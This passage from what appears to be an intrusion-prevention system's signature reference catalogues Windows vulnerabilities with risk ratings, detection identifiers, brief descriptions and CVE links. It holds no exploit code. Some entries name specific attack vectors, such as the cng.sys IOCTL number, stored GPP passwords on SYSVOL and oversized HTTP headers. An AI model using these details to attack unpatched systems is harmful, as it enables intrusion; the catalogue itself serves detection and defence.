https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4774
OSVDB-88313
http://www.osvdb.org/88313
MS12-081
http://technet.microsoft.com/security/bulletin/MS12-081
Back to top

Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812

About this vulnerability: A vulnerability in Windows Group Policy Preferences
Risk: High
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows Group Policy Preferences used to allow credentials to be specified, and the passwords were stored on SYSVOL share, which is accessible by all authenticated users. This allowed an easy elevation of privileges if credentials with administrator privileges were stored.
Situation: SMB-TCP_CHS-Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812
References:
CVE-2014-1812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1812
Back to top

Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Digital Image Suite
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: A vulnerability has been discovered in the Graphics Rendering Engine (GRE) component of Microsoft Windows. Specifically this vulnerability is exposed by the Microsoft Windows GDI+ subsystem. An attacker can exploit this vulnerability by enticing a user to open a malicious BMP file, resulting in either a denial of service, or in the injection and execution of arbitrary code with the privileges of the currently logged in user. In a successful attack, arbitrary code is supplied and executed on the vulnerable target host. The behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the logged in user. In an attack where code execution fails, the target application used to render the BMP will terminate abnormally.
Situation: File-Binary_Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow
References:
CVE-2008-3015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3015
BID-31022
http://www.securityfocus.com/bid/31022
MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052
Back to top

Windows-HTML-Platforms-Security-Feature-Bypass

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1849-5242
Last changed: sgpkg-ips-1849-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Universal naming convention (UNC) paths, a standardized format for identifying network resources, are often utilized in Windows exploits. They could be used, for example, to bypass Windows URL zone checks and run malicious executable on the victim's machine. This fingerprint detects potentially suspicious HTML elements with UNC paths being used in the place of normal links.
Situation: File-Text_Windows-HTML-Platforms-Security-Feature-Bypass
Back to top

Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: Moderate
First detected in: sgpkg-ips-1442-5242
Last changed: sgpkg-ips-1442-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A security feature bypass vulnerability has been reported in Windows HTML Platforms.
Situation: File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502
References:
CVE-2022-24502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24502
ms22-mar
http://technet.microsoft.com/security/bulletin/ms22-mar
Back to top

Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A security feature bypass vulnerability has been reported in Windows HTML Platforms.
Situation: File-Text_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
File-Binary_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
References:
CVE-2025-21269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21269
ms25-jan
http://technet.microsoft.com/security/bulletin/ms25-jan
Back to top

Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: HTTP_CSH-Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305
References:
CVE-2013-1305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1305
MS13-037
http://technet.microsoft.com/security/bulletin/MS13-037
Back to top

Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148

About this vulnerability: An attempt to exploit a vulnerability in Windows ICS DHCP server detected
Risk: High
First detected in: sgpkg-ips-1630-5242
Last changed: sgpkg-ips-1630-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows ICS DHCP server buffer overflow vulnerability.
Situation: BOOTP_CS-Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148
References:
CVE-2023-38148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38148
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679

About this vulnerability: An attempt to exploit a vulnerability in Windows Kerberos detected
Risk: High
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: Windows Kerberos Elevation of Privilege Vulnerability.
Situation: Generic_CS-Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679
References:
CVE-2022-33679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33679
Back to top

Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809

About this vulnerability: An attempt to exploit a vulnerability in Windows Kerberos detected
Risk: High
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows Kerberos's security feature bypass vulnerability CVE-2025-29809.
Situation: Generic_UDP-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Generic_CS-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
References:
CVE-2025-29809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29809
ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr
Back to top

Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the processing of IOCTL 0x390400 in the Windows Kernel, exposed by the Windows Kernel Cryptography Driver (cng.sys). A successful exploit can lead to privilege escalation, such as sandbox escape.
Situation: File-Text_Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087
References:
CVE-2020-17087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17087
Back to top

Windows-Local-Privilege-Escalation-CVE-2016-0167

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation exists in older Windows Kernels. An attacker who already has gained remote code execution on the client can utilize this vulnerability to elevate privileges.
Situation: File-Exe_Windows-Local-Privilege-Escalation-CVE-2016-0167
References:
CVE-2016-0167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0167
Back to top

Windows-Malware-Filename

About this vulnerability: Windows Malware Filename
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: Certain filenames are commonly associated with malware. Detecting malware by filename is not always reliable, as names can change, but many types of malware always use a specific unique name that allows the detection of the malware. Access to such filenames might mean that a remote compromise has occurred, or that someone is trying to remotely compromise the system. False alerts are also possible.
Situation: SMB-TCP_CHS-Malware-Filename-Access
Back to top

Windows-Mark-Of-The-Web-Bypass-CVE-2024-38213

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: CVE-2024-38213 is a bypass for Windows' Mark-of-the-Web protection. Before Microsoft's June 2024 security patch, files that are copied and pasted from WebDAV shares did not receive the Mark-of-the-Web designations. As a result, those files could subsequently be opened without the protections of Windows Defender SmartScreen or Microsoft Office Protected View.
Situation: File-Text_Suspicious-MS-Search-URI-Scheme-Link-In-HTML
References:
CVE-2024-38213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38213
Back to top

Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-1847-5242
Last changed: sgpkg-ips-1864-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows Mark-of-the-Web (MotW) security feature bypass vulnerability CVE-2025-24061.
Situation: File-Binary_Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061
References:
CVE-2025-24061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24061
ms25-mar
http://technet.microsoft.com/security/bulletin/ms25-mar
Back to top

Windows-Media-Center-RCE-CVE-2015-6127

About this vulnerability: An attempt to exploit a vulnerability in Windows Media Center Detected
Risk: Moderate
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: An attempt to exploit a vulnerability in Windows Media Center Detected
Situation: File-Text_Windows-Media-Center-RCE-CVE-2015-6127
References:
CVE-2015-6127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6127
MS15-134
http://technet.microsoft.com/security/bulletin/MS15-134
Back to top

Windows-Media-Center-RCE-CVE-2015-6131

About this vulnerability: An attempt to exploit a vulnerability in Windows Media Center Detected
Risk: Moderate
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: An attempt to exploit a vulnerability in Windows Media Center Detected
Situation: File-Text_Windows-Media-Center-RCE-CVE-2015-6131
References:
CVE-2015-6131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6131
MS15-134
http://technet.microsoft.com/security/bulletin/MS15-134
Back to top

Windows-Media-Decompression-Vulnerability-CVE-2013-0077

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-MPEG_Windows-Media-Decompression-Vulnerability-CVE-2013-0077
References:
CVE-2013-0077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0077
MS13-011
http://technet.microsoft.com/security/bulletin/MS13-011
Back to top

Windows-Media-HTTP-Stream-Download

About this vulnerability: Windows Media HTTP stream download
Risk: Low
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Insecure Configuration
Description: Windows Media Player is an application that is able to play video and audio files and streams. This includes streaming media over HTTP protocol.
Situation: HTTP_SS-Windows-Media-HTTP-Stream
File-Binary_Windows-Media-HTTP-Stream
Back to top

Windows-Media-Player-CVE-2017-0042

About this vulnerability: A vulnerability in Windows Media Player
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Windows Media Player
Situation: File-Text_Windows-Media-Player-CVE-2017-0042
File-RTF_Microsoft-Windows-CVE-2017-0042
References:
CVE-2017-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0042
MS17-015
http://technet.microsoft.com/security/bulletin/MS17-015
Back to top

Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818

About this vulnerability: A remote code execution vulnerability in Windows Media Player
Risk: Critical
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Malfunction
Description: There is a remote code execution vulnerability in Windows Media Player.
Situation: E-Mail_BS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
HTTP_SS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
File-Binary_Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
References:
CVE-2010-0818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0818
MS10-062
http://technet.microsoft.com/security/bulletin/MS10-062
Back to top

Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525

About this vulnerability: A heap corruption vulnerability in Windows Media Runtime
Risk: High
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Format Runtime; Windows Media Player
Type: Malfunction
Description: There is a heap corruption vulnerability in the Microsoft Windows Media Format processing engine. By enticing a target user to open a crafted ASF file with a vulnerable version of the affected software, a remote attacker can execute non-privileged arbitrary code.
Situation: E-Mail_BS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
HTTP_SS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
File-Binary_Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
References:
CVE-2009-2525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2525
MS09-051
http://technet.microsoft.com/security/bulletin/MS09-051
Back to top

Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555

About this vulnerability: A code execution vulnerability in Windows Media Runtime
Risk: High
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Format Runtime; Windows Media Player
Type: Malfunction
Description: There is a code execution vulnerability in the Microsoft Windows Media Format processing engine. By enticing a target user to open a crafted ASF file with a vulnerable version of Windows Media Player, a remote attacker is able to overrun a heap buffer, which can lead to non-privileged arbitrary code execution.
Situation: E-Mail_BS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
HTTP_SS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
File-Binary_Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
References:
CVE-2009-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0555
MS09-051
http://technet.microsoft.com/security/bulletin/MS09-051
Back to top

Windows-Media-Services-MX_STATS_LogLine-NSIISlog-DLL-BOF

About this vulnerability: Buffer overflow in MS Windows Media Services NSIISlog.dll extension
Risk: High
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000
Software: Windows Media Services
Type: Buffer Overflow
Description: Microsoft Windows 2000 and NT 4.0 Server are vulnerable to a stack-based buffer overflow in the ISAPI (Internet Services Application Programming Interface) nsiislog.dll extension of the Internet Information Services (IIS) Scripts directory. If the server is configured for Windows Media Services, a remote attacker could send a POST request containtng an overly large MX_STATS_LogLine header field to the server to overflow a buffer and cause a Denial of Service (DoS) or execute arbitrary code on the system.
Situation: HTTP_CS-Windows-Media-Services-MX-STATS-LogLine-NSIISlog-DLL-BOF
References:
BID-9878
http://www.securityfocus.com/bid/9878
Back to top

Windows-Media-Services-NSIISlog-DLL-BOF

About this vulnerability: Buffer overflow in MS Windows Media Services NSIISlog.dll extension
Risk: High
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS; Windows Media Services
Type: Buffer Overflow
Description: Microsoft Windows 2000 and NT 4.0 Server are vulnerable to a stack-based buffer overflow in the ISAPI (Internet Services Application Programming Interface) nsiislog.dll extension of the Internet Information Services (IIS) Scripts directory. If the server is configured for Windows Media Services, a remote attacker could send an overly large POST request to the server to overflow a buffer and cause a Denial of Service (DoS) or execute arbitrary code on the system.
Situation: HTTP_CS-Windows-Media-Services-NSIISlog-DLL-BOF
References:
CVE-2003-0349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0349
BID-8035
http://www.securityfocus.com/bid/8035
OSVDB-4535
http://www.osvdb.org/4535
MS03-022
http://technet.microsoft.com/security/bulletin/MS03-022
Back to top

Windows-Memory-Disclosure-CVE-2017-0038

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-856-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A heap-based out-of-bounds vulnerability exists in Microsoft Windows. A successful exploit could lead to memory disclosure.
Situation: File-Binary_Windows-Memory-Disclosure-CVE-2017-0038
References:
CVE-2017-0038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0038
Back to top

Windows-MFT-File-Name-Crash

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-926-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in Windows that causes the system to lock up or crash if a site with certain content is accessed. More specifically, a malicious site will contain a path referencing a file called $MFT.
Situation: File-Text_Windows-MFT-File-Name-Crash
Back to top

Windows-Mixed-Reality-Developer-Tools-Information-Disclosure

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-1512-5242
Last changed: sgpkg-ips-1512-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Windows Mixed Reality Developer Tools.
Situation: File-Text_Windows-Mixed-Reality-Developer-Tools-Information-Disclosure
References:
CVE-2022-37974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37974
ms22-oct
http://technet.microsoft.com/security/bulletin/ms22-oct
Back to top

Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112

About this vulnerability: A vulnerability in Windows MSHTML Platform
Risk: High
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1776-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A spoofing vulnerability has been reported in the Microsoft MSHTML Platform due to the handling of the mhtml URL prefix. If the URL in an Internet Shortcut file is prefixed with mhtml, clicking it on an unpatched system will cause the link to be opened in Internet Explorer instead of Microsoft Edge.
Situation: File-Text_Internet-Shortcut-File-MHTML-URL-Prefix
File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
File-TextId_Internet-Shortcut-File-MHTML-URL-Prefix
File-TextId_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
References:
CVE-2024-38112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38112
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573

About this vulnerability: A vulnerability in Windows MSHTML Platform
Risk: Moderate
First detected in: sgpkg-ips-1787-5242
Last changed: sgpkg-ips-1787-5242
Platform: Windows
Software: Internet Explorer; Microsoft Edge
Type: Malfunction
Description: A spoofing vulnerability has been reported in the Microsoft MSHTML Platform.
Situation: File-Text_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
File-PDF_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
References:
CVE-2024-43573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43573
ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct
Back to top

Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow

About this vulnerability: Microsoft Windows MSRPC Server Service buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-177-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The Microsoft Windows Server Service suffers from a buffer overflow vulnerability. A malicious request to the service can be used to cause buffer overflow, which can be used to execute arbitrary code on the vulnerable host.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-CVE-2008-4250-Exploit-Shellcode
MSRPC-TCP_CPS-Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
MSRPC-TCP_CPS-Vulnerable-Microsoft-Windows-Server-Service-Function-Called-2
MSRPC-TCP_CPS-Microsoft-Windows-Server-Service-NetPathCompare-Buffer-Overrun
MSRPC-TCP_CPS-Microsoft-Windows-WKSSVC-Path-Memory-Corruption
References:
CVE-2008-4250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
BID-31874
http://www.securityfocus.com/bid/31874
MS08-067
http://technet.microsoft.com/security/bulletin/MS08-067
Back to top

Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1597-5242
Last changed: sgpkg-ips-1600-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A remote codes execution vulnerability has been reported in Microsoft Network File System. The vulnerability is triggered when handling incoming NFSv4.1 call. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted call to the victim Network File System service. Successful exploitation of this vulnerability can result in remote code execution.
Situation: Generic_CS-Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941
References:
CVE-2023-24941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24941
ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may
Back to top

Windows-NFS-Service-RCE-CVE-2022-24491

About this vulnerability: CVE-2022-24491 in Windows NFS
Risk: High
First detected in: sgpkg-ips-1454-5242
Last changed: sgpkg-ips-1462-5242
Platform: Windows
Software: RPC
Type: Buffer Overflow
Description: A vulnerability exists in Windows NFS service.
Situation: Generic_UDP-Windows-NFS-CVE-2022-24491
SunRPC_TCP-Windows-NFS-CVE-2022-24491
References:
CVE-2022-24491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491
ms22-apr
http://technet.microsoft.com/security/bulletin/ms22-apr
Back to top

Windows-NFS-Service-RCE-CVE-2022-24497

About this vulnerability: CVE-2022-24497 in Windows NFS
Risk: High
First detected in: sgpkg-ips-1454-5242
Last changed: sgpkg-ips-1462-5242
Platform: Windows
Software: RPC
Type: Buffer Overflow
Description: A vulnerability exists in Windows NFS service.
Situation: Generic_UDP-Windows-NFS-CVE-2022-24497
SunRPC_TCP-Windows-NFS-CVE-2022-24497
References:
CVE-2022-24497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24497
ms22-apr
http://technet.microsoft.com/security/bulletin/ms22-apr
Back to top

Windows-Null-Session

About this vulnerability: Windows Null Session
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: A Windows null session is a remote logon to a windows host without using any username or password. Null session allows the remote intruder to gather a lot of information of the target systems, disclosing any potential vulnerabilities. The null session also allows the attacker to exploit these vulnerabilities, which could lead to remote compromise of the target system. The null session is mandatory for some windows services and completely disallowing it may lead to connectivity problems in various networking services. For this reason, it is not advisable to completely prevent null sessions within the organization's internal networks, but it is recommended to block null sessions in the network borders. In SGIPS there are null session-related situations that aim to cut the dangerous parts of the null sessions away. These situations can be deployed in drop mode even in the middle of an organization network. Because Null session is important in windows environments, sometimes even partial blocking of the null sessions might cause problems.
Situation: SMB-TCP_CHS-Null-Session-Samr-Access
Back to top

Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in Windows
Situation: File-Text_Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375
References:
CVE-2016-3375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3375
MS16-116
http://technet.microsoft.com/security/bulletin/MS16-116
Back to top

Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1626-5242
Platform: Windows
Software: Microsoft Outlook
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Outlook.
Situation: File-Binary_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-OLE_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-RTF_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
References:
CVE-2023-29325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29325
ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may
Back to top

Windows-Out-Of-Bounds-Vulnerability-CVE-2017-11906

About this vulnerability: An Out-Of-Bounds read vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An Out-Of-Bounds read vulnerability in Microsoft Windows. Successful exploitation of the vulnerability may lead to information disclosure.
Situation: File-Text_Windows-Out-Of-Bounds-Vulnerability-Poc
References:
CVE-2017-11906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906
Back to top

Windows-PDF-Information-Disclosure-CVE-2016-3201

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 8.1; Windows 2012; Windows 10.0; Windows 10.1511
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3201
References:
CVE-2016-3201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3201
MS16-080
http://technet.microsoft.com/security/bulletin/MS16-080
Back to top

Windows-PDF-Information-Disclosure-CVE-2016-3215

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 8.1; Windows 2012; Windows 10.1511
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: File-PDF_Windows-PDF-Information-Disclosure-CVE-2016-3215
References:
CVE-2016-3215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3215
MS16-080
http://technet.microsoft.com/security/bulletin/MS16-080
Back to top

Windows-PDF-Library-CVE-2016-3370

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1788-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability in Windows PDF Library.
Situation: File-PDF_Windows-PDF-Library-CVE-2016-3370
References:
CVE-2016-3370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3370
MS16-115
http://technet.microsoft.com/security/bulletin/MS16-115
Back to top

Windows-PDF-Remote-Code-Execution-CVE-2016-3203

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 8.1; Windows 2012; Windows 10.0; Windows 10.1511
Software: Microsoft Edge; Windows Server
Type: Input Validation
Description: A vulnerability in Microsoft Edge, and Microsoft Windows, versions 10, 10 Version 1511, 8.1, 2012, 2012 R2, which allows remote attackers to execute arbitrary code via a crafted PDF file, due to the improper validation of the crypt filter object Length entries.
Situation: File-PDF_Windows-PDF-Remote-Code-Execution-CVE-2016-3203
File-PDF_Microsoft-Windows-PDF-Library-Code-Execution
References:
CVE-2016-3203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3203
MS16-080
http://technet.microsoft.com/security/bulletin/MS16-080
Back to top

Windows-RDP-Client-Information-Disclosure-Vulnerability-CVE-2019-1108

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: File-Exe_Windows-Remote-Desktop-Protocol-Client-Information-Disclosure-Vulnerability-CVE-2019-1108
References:
CVE-2019-1108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1108
Back to top

Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability exists in Remote Desktop Protocol. A successful exploitation of this vulnerability can lead to information disclosure.
Situation: Generic_CS-Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896
References:
CVE-2020-16896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16896
ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct
Back to top

Windows-RDP-Remote-Code-Execution-CVE-2019-0708

About this vulnerability: A vulnerability in the Windows RDP service.
Risk: Moderate
First detected in: sgpkg-ips-1161-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability exists in Remote Desktop Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system.
Situation: Generic_CS-Windows-RDP-CVE-2019-0708
References:
CVE-2019-0708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0708
Back to top

Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-1842-5242
Last changed: sgpkg-ips-1842-5242
Platform: Windows
Software: <os>
Type: Directory Traversal
